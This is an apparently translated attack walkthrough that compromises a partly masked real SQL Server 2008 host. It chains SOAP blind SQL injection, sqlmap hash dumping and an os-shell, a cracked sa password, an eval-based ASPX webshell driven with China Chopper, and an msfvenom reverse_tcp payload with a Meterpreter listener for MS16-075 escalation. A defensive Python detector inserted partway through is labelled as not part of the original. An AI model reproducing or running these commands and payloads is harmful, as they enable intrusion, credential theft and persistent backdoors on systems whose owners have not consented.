SOAP injection against a SQL Server 2008 host, combined with MSF for privilege escalation

Source: Internet
Author: User
Tags: dba, echo command, soap, web services, wsdl

1.1.1 Scanning for SOAP injection vulnerabilities

1. Use the Web Services scanner in AWVS to scan for vulnerabilities

Open AWVS and select the Web Services scanner. As shown in Figure 1, enter the target URL in the WSDL URL field; note that it should normally end in asmx?wsdl when the service exposes an .asmx file. If there is no .asmx file, the URL can be entered directly, for example: http://1**.***.***.***:8081/?wsdl.

2. Handling the SQL blind injection finding

After the AWVS scan finishes, verify the URL reported under SQL Blind (26). In AWVS, click "View HTTP Headers" on the right and copy the contents into a text file; the vulnerable statement also has to be handled, which in this example is: <urn:string>-1&apos; or 3*2*1=6 and 000223=000223 or &apos;gPireHft&apos;=&apos;</urn:string>

Replace the part highlighted in red with "-1*" (the asterisk is sqlmap's custom injection marker).

3. The complete request (headers and body) reads as follows:

POST /service1.asmx HTTP/1.1
Content-Type: text/xml
SOAPAction: "http://tempuri.org/ZcpdList"
Content-Length: 716
X-Requested-With: XMLHttpRequest
Referer: http://1**.***.***.***:8081/?wsdl
Host: 1**.***.***.***:8081
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/" xmlns:urn2="http://tempuri.org/AbstractTypes">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:ZcpdList>
<urn:Inventory_dhs>
<urn:string>-1*</urn:string>
</urn:Inventory_dhs>
</urn:ZcpdList>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Response
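As an added defensive example (not part of the original walkthrough), the following Python script parses a SOAP body with the same ZcpdList/Inventory_dhs/string structure as the request above and flags string parameters carrying the indicators present in the payload AWVS reported: a quote breaking out of the literal followed by OR/AND, and tautologies such as 3*2*1=6 or 000223=000223. The sample bodies, the benign value and the indicator names are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"

# Heuristics matching pieces of the payload AWVS reported: a quote breaking out of
# the literal followed by a boolean operator, a repeated-operand tautology
# (000223=000223), an arithmetic comparison (3*2*1=6), a comment, a stacked statement.
INDICATORS = [
    ("quote_then_boolean", re.compile(r"'\s*(?:or|and)\b", re.I)),
    ("tautology", re.compile(r"\b(\d+)\s*=\s*\1\b")),
    ("arith_compare", re.compile(r"\d+\s*\*\s*\d+\s*=")),
    ("sql_comment", re.compile(r"--|/\*")),
    ("stacked_query", re.compile(r";\s*\w")),
]

# Constructed samples: the walkthrough's payload and a benign lookup value, wrapped in
# the same ZcpdList/Inventory_dhs/string structure as the request above.
SOAP_TEMPLATE = (
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="%s" xmlns:urn="http://tempuri.org/">'
    "<SOAP-ENV:Header/><SOAP-ENV:Body><urn:ZcpdList><urn:Inventory_dhs>"
    "<urn:string>%s</urn:string></urn:Inventory_dhs></urn:ZcpdList>"
    "</SOAP-ENV:Body></SOAP-ENV:Envelope>"
)
MALICIOUS_BODY = SOAP_TEMPLATE % (
    SOAP_NS, "-1&apos; or 3*2*1=6 and 000223=000223 or &apos;gPireHft&apos;=&apos;")
BENIGN_BODY = SOAP_TEMPLATE % (SOAP_NS, "DHS-2018-000223")


def soap_string_params(xml_text):
    """Yield (tag, text) for every leaf element inside the SOAP Body."""
    body = ET.fromstring(xml_text).find("{%s}Body" % SOAP_NS)
    for elem in body.iter() if body is not None else ():
        if len(elem) == 0 and elem.text and elem.text.strip():
            yield elem.tag, elem.text.strip()


def find_injection(xml_text):
    """Return [(tag, [indicator names])] for parameters that trip a heuristic.
    A body that is not well-formed XML is reported as well, since a filter that
    silently drops what it cannot parse is easy to bypass."""
    try:
        params = list(soap_string_params(xml_text))
    except ET.ParseError:
        return [("<unparseable>", ["xml_parse_error"])]
    hits = []
    for tag, value in params:
        names = [name for name, rx in INDICATORS if rx.search(value)]
        if names:
            hits.append((tag, names))
    return hits
```

Run against the walkthrough's payload the function reports the urn:string element with three indicators, while the benign lookup value produces no hit; the heuristics are a triage aid and should be paired with parameterized queries on the server side.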

1.1.2 Confirming the SOAP injection vulnerability

1. Use sqlmap to detect whether a SQL injection vulnerability is present

Save the request above as 1**.***.***.***.txt, copy the file into the directory containing sqlmap.py, and run: sqlmap.py -r 1**.***.***.***.txt. Confirm the prompts that sqlmap displays:

custom injection marker ('*') found in option '--data'. Do you want to process it? [y/n/q] y

SOAP/XML data found in POST data. Do you want to process it? [y/n/q] y

As shown in Figure 2, sqlmap confirms that the SQL injection vulnerability exists, that the database server runs Windows R2, that the database is SQL Server 2008, and that the SOAP injection point supports the UNION query technique.

Figure 2 A SOAP injection vulnerability exists

2. Check whether the database user has DBA privileges

(1) Submit the parameters automatically for testing

As shown in Figure 3, run: sqlmap.py -r 1**.***.***.***.txt --is-dba --batch. The two confirmation prompts are again answered Y, but because of the --batch parameter sqlmap submits the default answers automatically.

Figure 3 Automatic submission of the parameters for the check

(2) The current database user is the DBA account

As shown in Figure 4, sqlmap reports that the current user is the DBA, displaying the result as True. This indicates that the application connects with sa privileges, and a webshell can therefore be obtained through the --os-shell parameter.

Figure 4 Determining whether the current user is the DBA account

3. Get the sa account password

As shown in Figure 5, run sqlmap.py -r 1**.***.***.***.txt --password --batch to dump the password hashes of all database login accounts directly:

Figure 5 Obtaining the sa account password hash

4. Crack the sa account password

sqlmap successfully obtained the database password hashes in the previous step:

[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01001a7b0c5b5b347506dbc67aa8ffa2ad20f852076d8446a838

[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x01006c6443e1e42ca27773d413042ee8af2eea9026d44c8d4d1c

[*] sa [1]:
password hash: 0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28

Looking up the sa hash "0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28" on www.cmd5.com gives the plaintext "qaz123wsx".

1.1.3 Getting a webshell through --os-shell

1. Get an os-shell

Run sqlmap.py -r 1**.***.***.***.txt --os-shell and confirm the prompts in the sqlmap execution window:

custom injection marker ('*') found in option '--data'. Do you want to process it? [y/n/q] Y

SOAP/XML data found in POST data. Do you want to process it? [y/n/q] Y

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [y/n]

Alternatively, run sqlmap.py -r 1**.***.***.***.txt --os-shell --batch to avoid the manual confirmations.

2. Find the directory containing the web application

(1) View files and directories

After running dir c:\, the directories and files can be viewed; continue with dir c:\inetpub\wwwroot (Figure 7). No web program is present there, so that directory is excluded.

Figure 7 Viewing files and directories

(2) Locate the real website directory

By examining the C, D, E and F drives, the suspected website program files are found on drive E; view them with dir e:\software\ams_noflow (Figure 8).

Figure 8 Viewing the website files

3. Testing the real site directory

(1) File creation test

As shown in Figure 9, use the echo command echo "thisis test" >e:\software\ams_noflow\t.txt to create the file t.txt under the website root, with the content "thisis test".

Figure 9 Creating the test file

(2) Website access test

Enter http://1**.***.***.***/1.txt in the browser to test (Figure 10). The expected content is returned, so this directory is the real physical path of the site.

4. Get the contents of the web.config file

In os-shell, run type e:\software\AMS_NoFlow\web.config to view the web.config file. Because of display settings, the full contents may not be visible in the sqlmap command window, but sqlmap keeps the details in its output directory. Open its log file (Figure 11) to see that the sa password it contains is qaz123wsx, consistent with the sa password cracked earlier.

Figure 11 Viewing the web.config configuration file contents

5. Obtaining IP address information

As shown in Figure 12, the ipconfig command in os-shell reveals the target's IP configuration: it has an independent external IP address and an intranet IP address. Other commands can also be executed in os-shell.

6. Webshell test

(1) Create the shell file

Run the following command in os-shell: echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["Pass"],"unsafe");%^> > E:\software\ams_noflow\cmd.aspx

As shown in Figure 13, the echo command returns 1 with no further information, which indicates that the file was created successfully.

Figure 13 Creating the webshell

(2) Get the webshell

Use the Chinese kitchen knife (China Chopper) backdoor management tool to add a record for http://1**.***.***.***/cmd.aspx with the one-word backdoor password pass (Figure 14). The connection succeeds and the webshell is obtained.

1.1.4 Conventional privilege escalation methods fail

1. Generate the system information file

Run the following in os-shell: systeminfo > Syd1-0081dsb.txt

2. Download the Windows-Exploit-Suggester program

windows-exploit-suggester: https://github.com/gdssecurity/windows-exploit-suggester/

3. Update the vulnerability database and compare

Run windows-exploit-suggester.py -u in Python to update the database, then compare the system information against it:

windows-exploit-suggester.py --audit -l --database 2018-06-04-mssb.xls --systeminfo SYD1-0081DSB.txt > syd1-0081dsb-day.txt, as shown in Figure 15.

Figure 15 Vulnerability comparison

4. Review the vulnerability results

Open the file syd1-0081dsb-day.txt in the C:\Python27 directory (Figure 16). The program determines that the operating system is Windows R2 and that multiple vulnerabilities are present, the most recent being MS16-075.

Figure 16 Viewing the vulnerability results

5. Testing privilege escalation with the identified vulnerabilities

Based on the vulnerability numbers, collect and organize the exploit files and test them on the target server. Apart from the MS16-075 exploit, every test failed and privileges could not be escalated.

1.1.5 Privilege escalation with MS16-075 via MSF

1. Use MSF to generate a reverse-connection payload

Run the following command with MSF:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4433 -f exe -o 4433.exe

Here windows/meterpreter/reverse_tcp is the reverse-connection payload type; LHOST is the IP address of the server that receives the reverse connection, which must be a standalone server or have an external port mapping, in other words the reverse connection must be able to reach it; LPORT is the port for the reverse connection; and 4433.exe is the generated program.

2. Start the listener on the listening server

(1) Start MSF

msfconsole

(2) Configure the Meterpreter handler parameters

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.33
set LPORT 4433
exploit

3. Upload 4433.exe to the target server and run it

Upload the 4433.exe file to the target server and execute it via the Chinese kitchen knife tool or os-shell.

4. View system information

As shown in Figure 17, the target connects back to the listening server; running sysinfo returns its system information.
